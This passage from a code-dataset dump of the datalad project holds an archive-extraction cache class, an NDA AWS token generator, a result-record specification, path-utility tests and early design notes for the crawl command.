os.environ.get('DATALAD_TESTS_TEMP_KEEP'):\n # lgr.info(\"As instructed, not cleaning up the cache under %s\"\n # % self._path)\n # return\n\n for path, name in [\n (self._path, 'cache'),\n (self.stamp_path, 'stamp file')\n ]:\n if exists(path):\n if (not self._persistent) or force:\n lgr.debug(\"Cleaning up the %s for %s under %s\", name, self._archive, path)\n # TODO: we must be careful here -- to not modify permissions of files\n # only of directories\n (rmtree if isdir(path) else unlink)(path)\n\n @property\n def path(self):\n \"\"\"Given an archive -- return full path to it within cache (extracted)\n \"\"\"\n return self._path\n\n @property\n def stamp_path(self):\n return self._path + self.STAMP_SUFFIX\n\n @property\n def is_extracted(self):\n return exists(self.path) and exists(self.stamp_path) \\\n and os.stat(self.stamp_path).st_mtime >= os.stat(self.path).st_mtime\n\n def assure_extracted(self):\n \"\"\"Return path to the extracted `archive`. Extract archive if necessary\n \"\"\"\n path = self.path\n\n with lock_if_check_fails(\n check=(lambda s: s.is_extracted, (self,)),\n lock_path=path,\n operation=\"extract\"\n ) as (check, lock):\n if lock:\n assert not check\n self._extract_archive(path)\n return path\n\n def _extract_archive(self, path):\n # we need to extract the archive\n # TODO: extract to _tmp and then move in a single command so we\n # don't end up picking up broken pieces\n lgr.debug(\"Extracting %s under %s\", self._archive, path)\n if exists(path):\n lgr.debug(\n \"Previous extracted (but probably not fully) cached archive \"\n \"found. 
Removing %s\",\n path)\n rmtree(path)\n os.makedirs(path)\n assert (exists(path))\n # remove old stamp\n if exists(self.stamp_path):\n rmtree(self.stamp_path)\n decompress_file(self._archive, path, leading_directories=None)\n # TODO: must optional since we might to use this content, move it\n # into the tree etc\n # lgr.debug(\"Adjusting permissions to R/O for the extracted content\")\n # rotree(path)\n assert (exists(path))\n # create a stamp\n with open(self.stamp_path, 'wb') as f:\n f.write(ensure_bytes(self._archive))\n # assert that stamp mtime is not older than archive's directory\n assert (self.is_extracted)\n\n # TODO: remove?\n #def has_file_ready(self, afile):\n # lgr.debug(u\"Checking file {afile} from archive {archive}\".format(**locals()))\n # return exists(self.get_extracted_filename(afile))\n\n def get_extracted_filename(self, afile):\n \"\"\"Return full path to the `afile` within extracted `archive`\n\n It does not actually extract any archive\n \"\"\"\n return opj(self.path, afile)\n\n def get_extracted_files(self):\n \"\"\"Generator to provide filenames which are available under extracted archive\n \"\"\"\n path = self.assure_extracted()\n path_len = len(path) + (len(os.sep) if not path.endswith(os.sep) else 0)\n for root, dirs, files in os.walk(path): # TEMP\n for name in files:\n yield ensure_unicode(opj(root, name)[path_len:])\n\n def get_leading_directory(self, depth=None, consider=None, exclude=None):\n \"\"\"Return leading directory of the content within archive\n\n Parameters\n ----------\n depth: int or None, optional\n Maximal depth of leading directories to consider. If None - no upper\n limit\n consider : list of str, optional\n Regular expressions for file/directory names to be considered (before\n exclude). Applied to the entire relative path to the file as in the archive\n exclude: list of str, optional\n Regular expressions for file/directory names to be excluded from consideration.\n Applied to the entire relative path to the file as in the archive\n\n Returns\n -------\n str or None:\n If there is no single leading directory -- None returned\n \"\"\"\n leading = None\n # returns only files, so no need to check if a dir or not\n for fpath in self.get_extracted_files():\n if consider and not any_re_search(consider, fpath):\n continue\n if exclude and any_re_search(exclude, fpath):\n continue\n\n lpath = fpath.split(opsep)\n dpath = lpath[:-1] # directory path components\n if leading is None:\n leading = dpath if depth is None else dpath[:depth]\n else:\n if dpath[:len(leading)] != leading:\n # find smallest common path\n leading_ = []\n # TODO: there might be more efficient pythonic way\n for d1, d2 in zip(leading, dpath):\n if d1 != d2:\n break\n leading_.append(d1)\n leading = leading_\n if not len(leading):\n # no common leading - ready to exit\n return None\n return leading if leading is None else opj(*leading)\n\n def get_extracted_file(self, afile):\n lgr.debug(\"Requested file %s from archive %s\", afile, self._archive)\n # TODO: That could be a good place to provide \"compatibility\" layer if\n # filenames within archive are too obscure for local file system.\n # We could somehow adjust them while extracting and here channel back\n # \"fixed\" up names since they are only to point to the load\n self.assure_extracted()\n path = self.get_extracted_filename(afile)\n # TODO: make robust\n lgr.log(2, \"Verifying that %s exists\", abspath(path))\n assert exists(path), \"%s must exist\" % path\n return path\n\n def __del__(self):\n try:\n if 
self._persistent:\n self.clean()\n except Exception as e: # MIH: IOError?\n pass\n" }, { "alpha_fraction": 0.6202564835548401, "alphanum_fraction": 0.6236587166786194, "avg_line_length": 30.57851219177246, "blob_id": "3cf4d35d8fcd8899cdfcdee1d2eae8d9e0055ae6", "content_id": "d54b91643c8e2d5004ffda7fd2a6dc1aabb62c59", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3821, "license_type": "permissive", "max_line_length": 89, "num_lines": 121, "path": "/datalad/support/third/nda_aws_token_generator.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "## NDA AWS Token Generator\n## Author: NIMH Data Archives\n## http://ndar.nih.gov\n## License: MIT\n## https://opensource.org/licenses/MIT\n\nimport binascii\nimport hashlib\nimport logging\nimport xml.etree.ElementTree as etree\n\nimport sys\n\nif sys.version_info[0] == 2:\n import urllib2 as urllib_request\nelse:\n from urllib import request as urllib_request\n\nclass NDATokenGenerator(object):\n __schemas = {\n 'soap': 'http://schemas.xmlsoap.org/soap/envelope/',\n 'data': 'http://gov/nih/ndar/ws/datamanager/server/bean/jaxb'\n }\n\n def __init__(self, url):\n assert url is not None\n self.url = url\n logging.debug('constructed with url %s', url)\n\n def generate_token(self, username, password):\n logging.info('request to generate AWS token')\n encoded_password = self.__encode_password(password)\n request_xml = self.__construct_request_xml(username, encoded_password)\n return self.__make_request(request_xml)\n\n def __encode_password(self, password):\n logging.debug('encoding password')\n hasher = hashlib.sha1()\n hasher.update(password.encode('utf-8'))\n digest_bytes = hasher.digest()\n byte_string = binascii.hexlify(digest_bytes)\n output = byte_string.decode('utf-8')\n logging.debug('encoded password hash: %s', output)\n return output\n\n def __construct_request_xml(self, username, encoded_password):\n logging.debug('constructing request with %s - %s', username, encoded_password)\n soap_schema = self.__schemas['soap']\n datamanager_schema = self.__schemas['data']\n\n element = etree.Element('{%s}Envelope' % soap_schema)\n body = etree.SubElement(element, '{%s}Body' % soap_schema)\n userelement = etree.SubElement(body, '{%s}UserElement' % datamanager_schema)\n\n user = etree.SubElement(userelement, \"user\")\n uid = etree.SubElement(user, \"id\")\n uid.text = '0'\n\n uid = etree.SubElement(user, \"name\")\n uid.text = username\n\n uid = etree.SubElement(user, \"password\")\n uid.text = encoded_password\n\n uid = etree.SubElement(user, \"threshold\")\n uid.text = '0'\n\n logging.debug(etree.tostring(element))\n return etree.tostring(element)\n\n def __make_request(self, request_message):\n logging.debug('making post request to %s', self.url)\n\n headers = {\n 'SOAPAction': '\"generateToken\"',\n 'Content-Type': 'text/xml; charset=utf-8'\n }\n\n request = urllib_request.Request(self.url, data=request_message, headers=headers)\n logging.debug(request)\n response = urllib_request.urlopen(request)\n return self.__parse_response(response.read())\n\n def __parse_response(self, response):\n logging.debug('parsing response')\n tree = etree.fromstring(response)\n\n error = tree.find('.//errorMessage')\n if error is not None:\n error_msg = error.text\n logging.error('response had error message: %s', error_msg)\n raise Exception(error_msg)\n generated_token = tree[0][0]\n token_elements = [e.text for e in generated_token[0:4]]\n token = 
Token(*token_elements)\n return token\n\n\nclass Token:\n def __init__(self, access_key, secret_key, session, expiration):\n logging.debug('constructing token')\n self._access_key = access_key\n self._secret_key = secret_key\n self._session = session\n self._expiration = expiration\n\n @property\n def access_key(self):\n return self._access_key\n\n @property\n def secret_key(self):\n return self._secret_key\n\n @property\n def session(self):\n return self._session\n\n @property\n def expiration(self):\n return self._expiration\n" }, { "alpha_fraction": 0.735660195350647, "alphanum_fraction": 0.7365584373474121, "avg_line_length": 34.584476470947266, "blob_id": "7e9841e1f98383eba0b0f61a8b8106f68832ee5f", "content_id": "a9e7ddf2e16fec68a5782c3d54f0e209005cd383", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 7793, "license_type": "permissive", "max_line_length": 83, "num_lines": 219, "path": "/docs/source/design/result_records.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_result_records:\n\n**************\nResult records\n**************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation.\n\nResult records are the standard return value format for all DataLad commands.\nEach command invocation yields one or more result records. Result records are\nroutinely inspected throughout the code base, and are used to inform generic\nerror handling, as well as particular calling commands on how to proceed with\na specific operation.\n\nThe technical implementation of a result record is a Python dictionary. This\ndictionary must contain a number of mandatory fields/keys (see below). However,\nan arbitrary number of additional fields may be added to a result record.\n\nThe ``get_status_dict()`` function simplifies the creation of result records.\n\n.. note::\n Developers *must* compose result records with care! DataLad supports custom\n user-provided hook configurations that use result record fields to\n decide when to trigger a custom post-result operation. Such custom hooks\n rely on a persistent naming and composition of result record fields.\n Changes to result records, including field name changes, field value changes,\n but also timing/order of record emitting potentially break user set ups!\n\n\nMandatory fields\n================\n\nThe following keys *must* be present in any result record. If any of these\nkeys is missing, DataLad's behavior is undefined.\n\n\n``action``\n----------\n\nA string label identifying which type of operation a result is associated with.\nLabels *must not* contain white space. They should be compact, and lower-cases,\nand use ``_`` (underscore) to separate words in compound labels.\n\nA result without an ``action`` label will not be processed and is discarded.\n\n\n``path``\n--------\n\nA string with an *absolute* path describing the local entity a result is\nassociated with. Paths must be platform-specific (e.g., Windows paths on\nWindows, and POSIX paths on other operating systems). 
When a result is about an\nentity that has no meaningful relation to the local file system (e.g., a URL to\nbe downloaded), to ``path`` value should be determined with respect to the\npotential impact of the result on any local entity (e.g., a URL downloaded\nto a local file path, a local dataset modified based on remote information).\n\n.. _target-result-status:\n\n``status``\n----------\n\nThis field indicates the nature of a result in terms of four categories, identified\nby a string label.\n\n- ``ok``: a standard, to-be-expected result\n- ``notneeded``: an operation that was requested, but found to be unnecessary\n in order to achieve a desired goal\n- ``impossible``: a requested operation cannot be performed, possibly because\n its preconditions are not met\n- ``error``: an error occurred while performing an operation\n\nBased on the ``status`` field, a result is categorized into *success* (``ok``,\n``notneeded``) and *failure* (``impossible``, ``error``). Depending on the\n``on_failure`` parameterization of a command call, any failure-result emitted\nby a command can lead to an ``IncompleteResultsError`` being raised on command\nexit, or a non-zero exit code on the command line. With ``on_failure='stop'``,\nan operation is halted on the first failure and the command errors out\nimmediately, with ``on_failure='continue'`` an operation will continue despite\nintermediate failures and the command only errors out at the very end, with\n``on_failure='ignore'`` the command will not error even when failures occurred.\nThe latter mode can be used in cases where the initial status-characterization\nneeds to be corrected for the particular context of an operation (e.g., to\nrelabel expected and recoverable errors).\n\n\nCommon optional fields\n======================\n\nThe following fields are not required, but can be used to enrich a result\nrecord with additional information that improves its interpretability, or\ntriggers particular optional functionality in generic result processing.\n\n\n``type``\n--------\n\nThis field indicates the type of entity a result is associated with. This may\nor may not be the type of the local entity identified by the ``path`` value.\nThe following values are common, and should be used in matching cases, but\narbitrary other values are supported too:\n\n- ``dataset``: a DataLad dataset\n- ``file``: a regular file\n- ``directory``: a directory\n- ``symlink``: a symbolic link\n- ``key``: a git-annex key\n- ``sibling``: a Dataset sibling or Git remote\n\n\n``message``\n-----------\n\nA message providing additional human-readable information on the nature or\nprovenance of a result. Any non-``ok`` results *should* have a message providing\ninformation on the rational of their status characterization.\n\nA message can be a string or a tuple. In case of a tuple, the second item can\ncontain values for ``%``-expansion of the message string. Expansion is performed\nonly immediately prior to actually outputting the message, hence string formatting\nruntime costs can be avoided this way, if a message is not actually shown.\n\n\n``logger``\n----------\n\nIf a result record has a ``message`` field, then a given `Logger` instance\n(typically from ``logging.getLogger()``) will be used to automatically log\nthis message. The log channel/level is determined based on\n``datalad.log.result-level`` configuration setting. By default, this is\nthe ``debug`` level. 
When set to ``match-status`` the log level is determined\nbased on the ``status`` field of a result record:\n\n- ``debug`` for ``'ok'``, and ``'notneeded'`` results\n- ``warning`` for ``'impossible'`` results\n- ``error`` for ``'error'`` results\n\nThis feature should be used with care. Unconditional logging can lead to\nconfusing double-reporting when results rendered and also visibly logged.\n\n\n``refds``\n---------\n\nThis field can identify a path (using the same semantics and requirements as\nthe ``path`` field) to a reference dataset that represents the larger context\nof an operation. For example, when recursively processing multiple files across\na number of subdatasets, a ``refds`` value may point to the common superdataset.\nThis value may influence, for example, how paths are rendered in user-output.\n\n\n``parentds``\n------------\n\nThis field can identify a path (using the same semantics and requirements as\nthe ``path`` field) to a dataset containing an entity.\n\n\n``state``\n---------\n\nA string label categorizing the state of an entity. Common values are:\n\n- ``clean``\n- ``untracked``\n- ``modified``\n- ``deleted``\n- ``absent``\n- ``present``\n\n\n``error_message``\n-----------------\n\nAn error message that was captured or produced while achieving a result.\n\nAn error message can be a string or a tuple. In the case of a tuple, the\nsecond item can contain values for ``%``-expansion of the message string.\n\n\n``exception``\n-------------\n\nAn exception that occurred while achieving the reported result.\n\n\n``exception_traceback``\n-----------------------\n\nA string with a traceback for the exception reported in ``exception``.\n\n\nAdditional fields observed \"in the wild\"\n========================================\n\nGiven that arbitrary fields are supported in result records, it is impossible\nto compose a comprehensive list of field names (keys). However, in order to\ncounteract needless proliferation, the following list describes fields that\nhave been observed in implementations. 
Developers are encouraged to preferably\nuse compatible names from this list, or extend the list for additional items.\n\nIn alphabetical order:\n\n``bytesize``\n The size of an entity in bytes (integer).\n\n``gitshasum``\n SHA1 of an entity (string)\n\n``prev_gitshasum``\n SHA1 of a previous state of an entity (string)\n\n``key``\n The git-annex key associated with a ``type``-``file`` entity.\n" }, { "alpha_fraction": 0.5390608906745911, "alphanum_fraction": 0.5425466299057007, "avg_line_length": 31.73825454711914, "blob_id": "0cf25c70f6aa0821cfb41d6ae5c6800213c9c0b4", "content_id": "cb5de1670745fe1c9c666a743606bff99fbd2aaf", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4877, "license_type": "permissive", "max_line_length": 102, "num_lines": 149, "path": "/datalad/support/tests/test_path.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport os\nfrom pathlib import PurePosixPath\n\nfrom ...tests.utils_pytest import (\n SkipTest,\n assert_raises,\n eq_,\n with_tempfile,\n)\nfrom ...utils import (\n chpwd,\n on_windows,\n rmtree,\n)\nfrom ..path import (\n abspath,\n curdir,\n get_parent_paths,\n get_filtered_paths_,\n robust_abspath,\n split_ext,\n)\n\nimport pytest\n\n\n@with_tempfile(mkdir=True)\ndef test_robust_abspath(tdir=None):\n with chpwd(tdir):\n eq_(robust_abspath(curdir), tdir)\n try:\n if os.environ.get('DATALAD_ASSERT_NO_OPEN_FILES'):\n raise Exception(\"cannot test under such pressure\")\n rmtree(tdir)\n except Exception as exc:\n # probably windows or above exception\n raise SkipTest(\n \"Cannot test in current environment\") from exc\n\n assert_raises(OSError, abspath, curdir)\n eq_(robust_abspath(curdir), tdir)\n\n\ndef test_split_ext():\n eq_(split_ext(\"file\"), (\"file\", \"\"))\n\n eq_(split_ext(\"file.py\"), (\"file\", \".py\"))\n eq_(split_ext(\"file.tar.gz\"), (\"file\", \".tar.gz\"))\n eq_(split_ext(\"file.toolong.gz\"), (\"file.toolong\", \".gz\"))\n\n eq_(split_ext(\"file.a.b.c.d\"), (\"file\", \".a.b.c.d\"))\n eq_(split_ext(\"file.a.b.cccc.d\"), (\"file\", \".a.b.cccc.d\"))\n eq_(split_ext(\"file.a.b.ccccc.d\"), (\"file.a.b.ccccc\", \".d\"))\n\n eq_(split_ext(\"file.a.b..c\"), (\"file\", \".a.b..c\"))\n\n\[email protected](\"sep\", [None, '/', '\\\\'])\ndef test_get_parent_paths(sep):\n if sep is None:\n gpp = get_parent_paths\n else:\n from functools import partial\n gpp = partial(get_parent_paths, sep=sep)\n\n # sanity/border checks\n eq_(gpp([], []), [])\n eq_(gpp([], ['a']), [])\n eq_(gpp(['a'], ['a']), ['a'])\n\n # Helper to provide testing across different seps and platforms while\n # specifying only POSIX paths here in the test\n def _p(path):\n if sep is None:\n return path\n else:\n return path.replace('/', sep)\n _pp = lambda paths: list(map(_p, paths))\n\n # no absolute paths anywhere\n if on_windows:\n assert_raises(ValueError, gpp, 'C:\\\\a', ['a'])\n assert_raises(ValueError, gpp, ['a'], 'C:\\\\a')\n elif sep != '\\\\': # \\ does not make it absolute\n assert_raises(ValueError, gpp, _p('/a'), ['a'])\n assert_raises(ValueError, gpp, ['a'], [_p('/a')])\n 
assert_raises(ValueError, gpp, [_p('a//a')], ['a'])\n # dups the actual code but there is no other way AFAIK\n asep = {'/': '\\\\', None: '\\\\', '\\\\': '/'}[sep]\n assert_raises(ValueError, gpp, [f'a{asep}a'], ['a'])\n\n paths = _pp(['a', 'a/b', 'a/b/file', 'c', 'd/sub/123'])\n\n eq_(gpp(paths, []), paths)\n eq_(gpp(paths, [], True), [])\n\n # actually a tricky one! we should check in descending lengths etc\n eq_(gpp(paths, paths), paths)\n # every path is also its own parent\n eq_(gpp(paths, paths, True), paths)\n\n # subdatasets not for every path -- multiple paths hitting the same parent,\n # and we will be getting only a single entry\n # to mimic how git ls-tree operates\n eq_(gpp(paths, ['a']), ['a', 'c', _p('d/sub/123')])\n eq_(gpp(paths, ['a'], True), ['a'])\n\n # and we get the deepest parent\n eq_(gpp(_pp(['a/b/file', 'a/b/file2']), _pp(['a', 'a/b'])), _pp(['a/b']))\n\n\ndef test_get_filtered_paths_():\n # just to avoid typing all the same\n def gfp(*args, **kwargs):\n return list(get_filtered_paths_(*args, **kwargs))\n\n assert gfp(['a', 'b'], ['a', 'c']) == ['a']\n assert gfp(['a', 'b'], ['b']) == ['b']\n assert gfp(['a', 'b'], ['c']) == []\n\n assert gfp(['a', 'b'], ['a/b', 'c']) == [] # a is not subpath of a/b\n assert gfp(['a', 'b'], ['a/b', 'c'], include_within_path=True) == ['a'] # a is not subpath of a/b\n\n # all paths returned due to '.', and order is sorted\n paths = ['a', 'b', '1/2/3', 'abc']\n paths_sorted = sorted(paths)\n assert gfp(paths, ['.']) == paths_sorted\n assert gfp(paths, paths_sorted) == paths_sorted\n assert gfp(paths, paths_sorted, include_within_path=True) == paths_sorted\n # we can take a mix of str and Path\n assert gfp([PurePosixPath(paths[0])] + paths[1:], ['.']) == paths_sorted\n\n\n # nothing within empty \"filter_paths\" matches -- so no paths yielded\n assert gfp(paths, []) == []\n\n assert_raises(ValueError, gfp, ['/a'], [])\n assert_raises(ValueError, gfp, [PurePosixPath('/a')], [])\n assert_raises(ValueError, gfp, ['a'], ['/a'])\n assert_raises(ValueError, gfp, ['../a'], ['a'])" }, { "alpha_fraction": 0.7096094489097595, "alphanum_fraction": 0.7121382355690002, "avg_line_length": 33.7203254699707, "blob_id": "9b63024aff50bc3b31a5fe5d92a00fdee9922677", "content_id": "ccc2384a02bef7af6e3abc6d7ee07562a176945f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 21354, "license_type": "permissive", "max_line_length": 175, "num_lines": 615, "path": "/docs/design.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "Thoughts about redesign, well actually \"design\" since originally there\nwere none, of datalad crawl.\n\nGlobal portion of the config\n============================\n\n::\n\n [dataset]\n path =\n description = \n exec = \n\nData providers\n==============\n\n`crawl` command collects data present possibly across\ndifferent remote data providers (regular HTTP websites, AWS S3\nbuckets, etc) and then consolidates access to them within a single\ngit-annex'ed repository. 
`crawl` should also keep track of\nstatus/versions of the files, so in case of the updates (changes,\nremovals, etc) on remote sites, git-annex repository could be\ncorrespondingly updated.\n\nCommon config specs::\n\n [provider:XXX]\n type = (web|s3http|merge|git-annex) # default to web\n branch = master # default to master\n commit_to_git = # regexps of file names to commit directly to git\n ignore = # files to ignore entirely\n drop = False # either to drop the load upon 'completion'\n # some sanity checks\n check_entries_limit = -1 # no limit by default\n\n\n(To be) Supported data providers\n--------------------------------\n\nWeb\n~~~\n\nIn many usecases data are hosted on a public portal, lab website,\npersonal page, etc. Such data are often provided in tarballs, which\nneed to be downloaded and extracted later on. Extraction will not be\na part of this provider -- only download from the web::\n\n [provider:incoming_http]\n type = web\n mode = (download|fast|relaxed) # fast/relaxed/download\n filename = (url|request) # of cause also could be _e'valuated given the bs4 link get_video_filename(link, filename)\n recurse_(a|href) = # regexes to recurse\n # mimicking scrapy\n start_urls = http://... #\n certificates = # if there are https -- we need to allow specifying those\n allowed_domains = example.com/buga/duga # to limit recursion\n sample.com\n excluded_hrefs = # do not even search for \"download\" URLs on given pages. Should also allow to be a function/callback to decide based on request?\n include_(a|href) = # what to download\n exclude_(a|href) = # and not (even if matches)\n ???generators = generate_readme # Define some additional actions to be performed....\n\nWe need to separate options for crawling (recursion etc) and deciding\nwhat to download/annex.\n\nQ: should we just specify xpath's for information to get extracted\n from a response corresponding to a matching url? just any crawled page?\n\nQ: allow to use xpath syntax for better control of what to recurse/include?\n\nQ: authentication -- we should here relate to the Hostings\n!: scrapy's Spider provides start_requests() which could be used to\n initiate the connection, e.g. to authenticate and then use that connection.\n Authentication detail must not be a part of the configuration, BUT\n it must know HOW authentication should be achieved. In many cases could\n be a regular netrc-style support (so username/password).\n\n Those authenticators should later be reused by \"download clients\"\n\nQ: we might need to worry/test virtually about every possible associated\n to http downloads scenario, e.g. support proxy (with authentication).\n May be we could just switch to aria2 and allow to specify access options?\n\nQ: may be (a new provider?) allow to use a scrapy spider's output to\n harvest the table of links which need to be fetched\n\n\n\nUse cases to keep in mind\n+++++++++++++++++++++++++\n\n- versioning present in the file names\n ftp://ftp.ncbi.nlm.nih.gov/1000genomes/ftp/sequence_indices/\n\n - ha -- idea, all those should be referred in some other branch, like\n with archives, and then 'public' one would just take care about\n pointing to the \"correct one\" and serve a \"compressed\" view.\n Hence: monitor original, point \"compressed\" to a branch giving it\n a set of rules on how to determine version, i.e. 
on which files\n This way we could have both referenced in the same repository.\n\n\nAmazon S3\n~~~~~~~~~\n\nInitial accent will be made on S3 buckets which have versioning\nenabled, and which expose their content via regular http/https.\n\ntricky points:\n- versioning (must be enabled. If uploaded before enabled, version is Null)\n\n- etags are md5s BUT only if upload was not multi-chunked, so\n it becomes difficult to identify files by md5sums (must be\n downloaded first then, or some meta-info of file should be modified so\n etag gets regenerated -- should result in file md5sum appearing as etag)\n\n- S3 most probably would be just an additional -- not the primary provider\n\n\nGenerated\n~~~~~~~~~\n\nWe should allow for files to be generated based on the content of the\nrepository and/or original information from the data providers,\ne.g. content of the webpages containing the files to be\ndownloaded/referenced. Originally envisioned as a separate branch,\nwhere only archived content would be downloaded and later extracted\ninto corresponding locations of the \"public\" branch (e.g. master).\n\nBut may be it should be more similar to the stated above \"versioning\"\nidea where it would simply be an alternative \"view\" of another branch,\nwhere some content is simply extracted. I.e. all those modifications\ncould be assembled as a set of \"filters\"::\n\n [generator:generate_readme]\n filename = README.txt\n content_e = generate_readme(link, filename) # those should be obtained/provided while crawling\n\nor\n\n [generator:fetch_license]\n filename = LICENSE.txt\n content_e = fetch_license(link, filename) # those should be obtained/provided while crawling\n\n\nMerge\n~~~~~\n\nOriginally fetched Files might reside in e.g. 'incoming' branch while\n'master' branch then could be 'assembled' from few other branches with\nhelp of filtering::\n\n [provider:master]\n type = merge\n branch = master # here matches the name but see below if we need to repeat\n merge = incoming_data_http\n incoming_meta_website\n filters = extract_models\n extract_data\n generate_some_more_files_if_you_like\n\n\nQ: should we may be 'git merge --no-commit' and then apply the\n filters???\n\n probably not since there could be conflicts if similarly named file\n is present in target branch (e.g. generated) and was present\n (moved/renamed via filters) in the original branch.\n\nQ: but merging of branches is way too cool and better establishes the\n 'timeline' and dependencies...\n So merge should be done \"manually\" by doing (there must be cleaner way)::\n\n git merge -s ours --no-commit\n git rm -r *\n # - collect and copy files for all the File's from branches to .\n # - stage all the files\n # - pipe those \"File\"s from all the branches through the filters\n # (those should where necessary use git rm, mv, etc)\n # - add those File's to git/git-annex\n git commit\n\n but what if a filter (e.g. cmd) requires current state of files from\n different branches?... all possible conflict problems could be\n mitigated by storing content in branches under some directories,\n then manipulating upon \"merge\" and renaming before actually 'git merging'\n\n\nQ: what about filters per incoming branch??? we could options for\n filters specification\n (e.g. extract_models[branches=incoming_data_http]) or allow\n only regular 2-edge merge at a time but multiple times...\n\n\nXNAT, COINS, ...\n~~~~~~~~~~~~~~~~\n\nLater ... 
but the idea should be the same I guess: they should expose\ncollections of File's with a set of URIs so they could be addurl'ed to\nthe files. It is not clear yet either they would need to be crawled\nor would provide some API similar to S3 to request all the necessary\ninformation?\n\n\ngit/git-annex\n~~~~~~~~~~~~~\n\nIf provider is already a Git(-annex) repository. Usecase:\nforrest_gump. So it is pretty much a regular remote **but** it might\nbenefit from our filters etc.\n\n\ntorrent\n~~~~~~~\n\nI guess similar/identical to archives if torrent points to a single\nfile -- so just 'addurl'. If torrent provides multiple files, would\nneed mapping of UUIDs I guess back to torrents/corresponding files.\nSo again -- similar to archives...?\n\naria2 seems to provide a single unified HTTP/HTTPS/FTP/BitTorrent\nsupport, with fancy simultaneous fetching from multiple\nremotes/feeding back to the torrent swarm (caution for non-free data).\nIt also has RPC support, which seems to be quite cool and might come\nhandy (e.g. to monitor progress etc)\n\n\nWild: Git repository for being rewritten\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\ntheoretically we could collect all the information to rewrite some\nother Git repo but now injecting some files into git-annex (while\npossibly even pointing for the load to e.g. original SVN repo).\n\nTricky:\n- branches and merges -- would be really tricky and so far not\n envisioned how\n- \"updates\" should correspond to commits in original repository\n- all the commit information should be extracted/provided for the\n commit here\n\n\nFilters\n=======\n\nConsidering idea that all the modifications (archives extraction,\nversioning etc) could be made through monitoring of another branch(es)\nand applying a set of filters.\n\n- files which aren't modified, should also propagate into target\n branch, along with all their urls\n\n file by file wouldn't work since filter might need to analyze the\n entire list of files...::\n\n def apply_filters(self):\n files_out = files_in\n for filter in self.filters:\n files_out = filter.apply(files_out)\n return files_out\n\n then each filter would decide on how to treat the list of files.\n May be some filters' subtyping would be desired\n (PerfileFilter/AllfilesFilter)\n\n- filters should provide API to 'rerun' their action to obtain the\n same result.\n\n\nCross-branch\n------------\n\nSome filters to be applied on files from one branch to have results\nplaced into another:\n\n\nExtract\n~~~~~~~\n\nSpecial kind of a beast: while keeping the original archive under\ngit-annex obtained from any other provider (e.g. 'Web'), we extract\nthe load (possibly with some filtering/selection):\n\n Q: how to deal with extract from archives -- extraction should\n better be queued to extract multiple files from the archive at\n once. But ATM it would not happen since all those URIs will\n simply be requested by simple wget/curl calls by git-annex file\n at a time.\n A: upon such a first call, check if there is .../extracted_key/key/, if\n there is -- use. If not -- extract and then use. 
use = hardlink\n into the target file.\n Upon completion of `datalad get` (or some other command) verify\n that all `/extracted/` are removed (and/or provide setting -- may\n be we could/should just keep those around)\n\n\nConfig Examples:\n++++++++++++++++\n\n::\n\n [filter:extract_models]\n filter = extract # by default would be taken as the element after \"filter:\"\n input = *(\\S+)_models\\.tgz$ # and those files are not provided into output\n output_prefix = models/$1/ # somehow we should allow to reuse input regex's groups\n exclude = # regex for files to be excluded from extraction or straight for tar?\n strip_path = 1\n\nProbably will just use patoolib (do not remember if has\nstrip_path... seems not:\nhttps://bugs.debian.org/cgi-bin/bugreport.cgi?bug=757483)\n\nURI: dl:extract:UID\n\nand we keep information for what 'key' it came into what file (which\nmight later get renamed, so extraction from the archive shouldn't\nlater happen in-place, but rather outside and then moved accordingly)\n\nTricky point(s):\n\n- may be by default should still extract all known archives types and\n just rely on the filename logic?\n- the same file might be available from multiple archives.\n So we would need to keep track from previous updates, from which\n archive files could be fetched.\n - how to remove if archive is no longer avail?\n probably some fsck should take care about checking if archives\n are still avail, and if not -- remove the url\n\n- keep track which files came from the archive, so we could later\n remove them happen if archive misses the file now.\n\nQ: allow for 'relaxed' handling?\n If tarballs are not versioned at all, but we would like to create\n overall (? or just per files) 'relaxed' git-annex?\n\n Probably no complication if URIs will be based (natively) on the\n fast or relaxed keys. Sure thing things would fail if archive was\n changed and lacks the file.\n\nQ: hm -- what about MD5SUM checking? e.g. if archive was posted with\n the MD5SUMs file\n\n I guess some kind of additional filter which could be attached\n somehow?\n\n\nMove/Rename/Delete\n~~~~~~~~~~~~~~~~~~\n\nJust move/rename/delete some files around e.g. for a custom view of\nthe dataset (e.g. to conform to OpenfMRI layout). Key would simply be\nreused ;)\n\nQ: should it be 'Within-branch' filter?\n\n\nCommand\n~~~~~~~\n\nA universal filter which would operate on some files and output\npossibly in place or modified ones...\n\nThen it would need to harvest and encode into file's URI the\nprovenance -- i.e. so it could later be recreated automagically.\n\nFor simple usecases (e.g. creation of lateralized atlas in HOX, some\ndata curation, etc)\n\nURI: dl:cmd:UID\n\nwhile we keep a file providing the corresponding command for each UID,\nwhere ARGUMENTS will would point to the original files keys in the git\nannex. Should it be kept in PROV format may be???\n\nConfig Examples::\n\n [filter:command_gunzip]\n in1 = *\\.gz\n in2_e = in1.replace('.gz', '')\n #eval_order=in1 in2\n command = zcat {in1} > {in2}\n output_files = {in2}\n\nProblems:\n\n- might be tricky to provide generic enough interface?\n- we need plentiful of use-cases to get it right, so this one is just\n to keep in mind for future -- might be quite cool after 